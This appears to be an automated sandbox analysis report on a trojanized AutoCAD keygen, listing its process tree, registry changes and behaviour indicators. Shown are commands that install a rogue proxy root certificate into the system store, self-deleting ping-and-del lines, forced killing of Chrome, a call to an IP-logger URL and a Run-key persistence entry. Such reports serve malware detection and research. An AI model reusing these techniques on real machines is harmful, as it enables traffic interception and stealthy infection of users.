3130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Install.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	7146042.78
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	D8F6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 19000000010000001000000018e847daffeaedafa0faaea36340ea790f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Install.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
1376	PING.EXE
984	PING.EXE
2040	PING.EXE
944	PING.EXE
1532	PING.EXE
516	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2032	3ECF.tmp.exe
1556	file.exe
1556	file.exe
1556	file.exe
1556	file.exe
2224	jfiag3g_gg.exe
1156	7146042.78
1156	7146042.78
1432	1319091.14
2688	23E04C4F32EF2158.tmp
2688	23E04C4F32EF2158.tmp
3008	seed.exe
3008	seed.exe
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1724	msiexec.exe
2240	dw20.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
3008	seed.exe
2920	bcdedit.exe
2952	bcdedit.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1556	file.exe
Token: SeCreateTokenPrivilege	1556	file.exe
Token: SeShutdownPrivilege	1724	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1724	msiexec.exe
Token: SeRestorePrivilege	1444	msiexec.exe
Token: SeTakeOwnershipPrivilege	1444	msiexec.exe
Token: SeSecurityPrivilege	1444	msiexec.exe
Token: SeCreateTokenPrivilege	1724	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1724	msiexec.exe
Token: SeLockMemoryPrivilege	1724	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1724	msiexec.exe
Token: SeMachineAccountPrivilege	1724	msiexec.exe
Token: SeTcbPrivilege	1724	msiexec.exe
Token: SeSecurityPrivilege	1724	msiexec.exe
Token: SeTakeOwnershipPrivilege	1724	msiexec.exe
Token: SeLoadDriverPrivilege	1724	msiexec.exe
Token: SeSystemProfilePrivilege	1724	msiexec.exe
Token: SeSystemtimePrivilege	1724	msiexec.exe
Token: SeProfSingleProcessPrivilege	1724	msiexec.exe
Token: SeIncBasePriorityPrivilege	1724	msiexec.exe
Token: SeCreatePagefilePrivilege	1724	msiexec.exe
Token: SeCreatePermanentPrivilege	1724	msiexec.exe
Token: SeBackupPrivilege	1724	msiexec.exe
Token: SeRestorePrivilege	1724	msiexec.exe
Token: SeShutdownPrivilege	1724	msiexec.exe
Token: SeDebugPrivilege	1724	msiexec.exe
Token: SeAuditPrivilege	1724	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1724	msiexec.exe
Token: SeChangeNotifyPrivilege	1724	msiexec.exe
Token: SeRemoteShutdownPrivilege	1724	msiexec.exe
Token: SeUndockPrivilege	1724	msiexec.exe
Token: SeSyncAgentPrivilege	1724	msiexec.exe
Token: SeEnableDelegationPrivilege	1724	msiexec.exe
Token: SeManageVolumePrivilege	1724	msiexec.exe
Token: SeImpersonatePrivilege	1724	msiexec.exe
Token: SeCreateGlobalPrivilege	1724	msiexec.exe
Token: SeCreateTokenPrivilege	1724	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1724	msiexec.exe
Token: SeLockMemoryPrivilege	1724	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1724	msiexec.exe
Token: SeMachineAccountPrivilege	1724	msiexec.exe
Token: SeTcbPrivilege	1724	msiexec.exe
Token: SeSecurityPrivilege	1724	msiexec.exe
Token: SeTakeOwnershipPrivilege	1724	msiexec.exe
Token: SeLoadDriverPrivilege	1724	msiexec.exe
Token: SeSystemProfilePrivilege	1724	msiexec.exe
Token: SeSystemtimePrivilege	1724	msiexec.exe
Token: SeProfSingleProcessPrivilege	1724	msiexec.exe
Token: SeIncBasePriorityPrivilege	1724	msiexec.exe
Token: SeCreatePagefilePrivilege	1724	msiexec.exe
Token: SeCreatePermanentPrivilege	1724	msiexec.exe
Token: SeBackupPrivilege	1724	msiexec.exe
Token: SeRestorePrivilege	1724	msiexec.exe
Token: SeShutdownPrivilege	1724	msiexec.exe
Token: SeDebugPrivilege	1724	msiexec.exe
Token: SeAuditPrivilege	1724	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1724	msiexec.exe
Token: SeChangeNotifyPrivilege	1724	msiexec.exe
Token: SeRemoteShutdownPrivilege	1724	msiexec.exe
Token: SeUndockPrivilege	1724	msiexec.exe
Token: SeSyncAgentPrivilege	1724	msiexec.exe
Token: SeEnableDelegationPrivilege	1724	msiexec.exe
Token: SeManageVolumePrivilege	1724	msiexec.exe
Token: SeImpersonatePrivilege	1724	msiexec.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
1724	msiexec.exe
2688	23E04C4F32EF2158.tmp
2828	iexplore.exe
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2828	iexplore.exe
2828	iexplore.exe
3048	IEXPLORE.EXE
3048	IEXPLORE.EXE
3048	IEXPLORE.EXE
3048	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 776 wrote to memory of 1592	776	Autodesk_AutoCAD_keygen_by_KeygenNinja.exe	29
PID 776 wrote to memory of 1592	776	Autodesk_AutoCAD_keygen_by_KeygenNinja.exe	29
PID 776 wrote to memory of 1592	776	Autodesk_AutoCAD_keygen_by_KeygenNinja.exe	29
PID 776 wrote to memory of 1592	776	Autodesk_AutoCAD_keygen_by_KeygenNinja.exe	29
PID 1592 wrote to memory of 520	1592	cmd.exe	31
PID 1592 wrote to memory of 520	1592	cmd.exe	31
PID 1592 wrote to memory of 520	1592	cmd.exe	31
PID 1592 wrote to memory of 520	1592	cmd.exe	31
PID 1592 wrote to memory of 520	1592	cmd.exe	31
PID 1592 wrote to memory of 520	1592	cmd.exe	31
PID 1592 wrote to memory of 520	1592	cmd.exe	31
PID 1592 wrote to memory of 460	1592	cmd.exe	32
PID 1592 wrote to memory of 460	1592	cmd.exe	32
PID 1592 wrote to memory of 460	1592	cmd.exe	32
PID 1592 wrote to memory of 460	1592	cmd.exe	32
PID 1592 wrote to memory of 1452	1592	cmd.exe	33
PID 1592 wrote to memory of 1452	1592	cmd.exe	33
PID 1592 wrote to memory of 1452	1592	cmd.exe	33
PID 1592 wrote to memory of 1452	1592	cmd.exe	33
PID 1592 wrote to memory of 1956	1592	cmd.exe	34
PID 1592 wrote to memory of 1956	1592	cmd.exe	34
PID 1592 wrote to memory of 1956	1592	cmd.exe	34
PID 1592 wrote to memory of 1956	1592	cmd.exe	34
PID 520 wrote to memory of 1940	520	keygen-pr.exe	36
PID 520 wrote to memory of 1940	520	keygen-pr.exe	36
PID 520 wrote to memory of 1940	520	keygen-pr.exe	36
PID 520 wrote to memory of 1940	520	keygen-pr.exe	36
PID 520 wrote to memory of 1940	520	keygen-pr.exe	36
PID 520 wrote to memory of 1940	520	keygen-pr.exe	36
PID 520 wrote to memory of 1940	520	keygen-pr.exe	36
PID 1956 wrote to memory of 1556	1956	keygen-step-4.exe	37
PID 1956 wrote to memory of 1556	1956	keygen-step-4.exe	37
PID 1956 wrote to memory of 1556	1956	keygen-step-4.exe	37
PID 1956 wrote to memory of 1556	1956	keygen-step-4.exe	37
PID 1940 wrote to memory of 268	1940	key.exe	38
PID 1940 wrote to memory of 268	1940	key.exe	38
PID 1940 wrote to memory of 268	1940	key.exe	38
PID 1940 wrote to memory of 268	1940	key.exe	38
PID 1940 wrote to memory of 268	1940	key.exe	38
PID 1940 wrote to memory of 268	1940	key.exe	38
PID 1940 wrote to memory of 268	1940	key.exe	38
PID 1452 wrote to memory of 1480	1452	keygen-step-3.exe	39
PID 1452 wrote to memory of 1480	1452	keygen-step-3.exe	39
PID 1452 wrote to memory of 1480	1452	keygen-step-3.exe	39
PID 1452 wrote to memory of 1480	1452	keygen-step-3.exe	39
PID 1480 wrote to memory of 2040	1480	cmd.exe	41
PID 1480 wrote to memory of 2040	1480	cmd.exe	41
PID 1480 wrote to memory of 2040	1480	cmd.exe	41
PID 1480 wrote to memory of 2040	1480	cmd.exe	41
PID 1556 wrote to memory of 1984	1556	file.exe	43
PID 1556 wrote to memory of 1984	1556	file.exe	43
PID 1556 wrote to memory of 1984	1556	file.exe	43
PID 1556 wrote to memory of 1984	1556	file.exe	43
PID 1984 wrote to memory of 2032	1984	3ECF.tmp.exe	44
PID 1984 wrote to memory of 2032	1984	3ECF.tmp.exe	44
PID 1984 wrote to memory of 2032	1984	3ECF.tmp.exe	44
PID 1984 wrote to memory of 2032	1984	3ECF.tmp.exe	44
PID 1984 wrote to memory of 2032	1984	3ECF.tmp.exe	44
PID 1984 wrote to memory of 2032	1984	3ECF.tmp.exe	44
PID 1984 wrote to memory of 2032	1984	3ECF.tmp.exe	44
PID 1984 wrote to memory of 2032	1984	3ECF.tmp.exe	44
PID 1984 wrote to memory of 2032	1984	3ECF.tmp.exe	44
PID 1984 wrote to memory of 2032	1984	3ECF.tmp.exe	44
PID 1984 wrote to memory of 2032	1984	3ECF.tmp.exe	44

C:\Users\Admin\AppData\Local\Temp\Autodesk_AutoCAD_keygen_by_KeygenNinja.exe
"C:\Users\Admin\AppData\Local\Temp\Autodesk_AutoCAD_keygen_by_KeygenNinja.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:776
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1592
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:520
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1940
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:268
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:460
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1452
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1480
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2040
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies data under HKEY_USERS
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1556
    - - C:\Users\Admin\AppData\Roaming\3ECF.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\3ECF.tmp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1984
      - C:\Users\Admin\AppData\Roaming\3ECF.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\3ECF.tmp.exe"
        6⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2032
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        5⤵
        
        PID:1200
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:944
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Writes to the Master Boot Record (MBR)
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Modifies system certificate store
      PID:1996
    - - C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        5⤵
        Enumerates connected drives
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1724
    - - C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
        
        C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetThreadContext
        
        PID:940
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        
        PID:1840
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        
        PID:1512
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        
        PID:2024
      - C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
        6⤵
        Executes dropped EXE
        
        PID:2304
      - C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
        
        "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        
        PID:2344
      - C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
        
        C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\is-GMCO5.tmp\23E04C4F32EF2158.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GMCO5.tmp\23E04C4F32EF2158.tmp" /SL5="$40216,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:2688
        
        C:\Program Files (x86)\DTS\seed.sfx.exe
        
        "C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s1
        8⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:2752
        
        C:\Program Files (x86)\Seed Trade\Seed\seed.exe
        
        "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
        9⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3008
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/14Zhe7"
        8⤵
        
        PID:2764
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/14Zhe7
        9⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2828
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2828 CREDAT:275457 /prefetch:2
        10⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3048
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
        6⤵
        
        PID:608
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:1376
    - - C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
        
        C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
        5⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        
        PID:1900
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:1512
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:1908
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
        6⤵
        
        PID:1088
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:516
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
        5⤵
        
        PID:560
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        6⤵
        Runs ping.exe
        
        PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:872
    - - C:\Users\Admin\AppData\Local\Temp\JV1LDW0FG3\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\JV1LDW0FG3\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1912
      - C:\Users\Admin\AppData\Local\Temp\JV1LDW0FG3\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\JV1LDW0FG3\multitimer.exe" 1 101
        6⤵
        Executes dropped EXE
        
        PID:888
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
      4⤵
      Executes dropped EXE
      PID:1200
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:1552
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:2020
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
      4⤵
      Executes dropped EXE
      PID:1060
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
      4⤵
      Executes dropped EXE
      PID:1548
    - - C:\ProgramData\7146042.78
        
        "C:\ProgramData\7146042.78"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:1156
    - - C:\ProgramData\2633692.28
        
        "C:\ProgramData\2633692.28"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1200
      - C:\ProgramData\Windows Host\Windows Host.exe
        
